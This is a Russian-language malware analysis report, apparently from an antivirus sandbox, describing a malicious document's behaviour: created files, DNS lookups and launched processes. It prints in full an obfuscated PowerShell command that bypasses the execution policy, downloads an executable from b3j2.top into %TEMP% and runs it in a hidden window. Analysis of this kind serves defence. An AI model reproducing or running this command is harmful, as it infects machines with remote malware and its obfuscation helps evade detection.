Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powe^rshell -Execut^ionPolicy ByPass -NoProfile -c $ytrewd=('%TEMP%\serarator.exe');(New-Obj^ect net.^Webclient).('down'+'loadfi'+'le').invoke('ht'+'tp://b3j2.top/mancity/',$ytrewd);Invoke-I...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1992
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1375757.cvr
Сетевая активность
UDP
- DNS ASK b3##.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powe^rshell -Execut^ionPolicy ByPass -NoProfile -c $ytrewd=('%TEMP%\serarator.exe');(New-Obj^ect net.^Webclient).('down'+'loadfi'+'le').invoke('ht'+'tp://b3j2.top/mancity/',$ytrewd);Invoke-I...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -NoProfile -c $ytrewd=('%TEMP%\serarator.exe');(New-Object net.Webclient).('down'+'loadfi'+'le').invoke('ht'+'tp://b3j2.top/mancity/',$ytrewd);Invoke-Item($ytrewd)
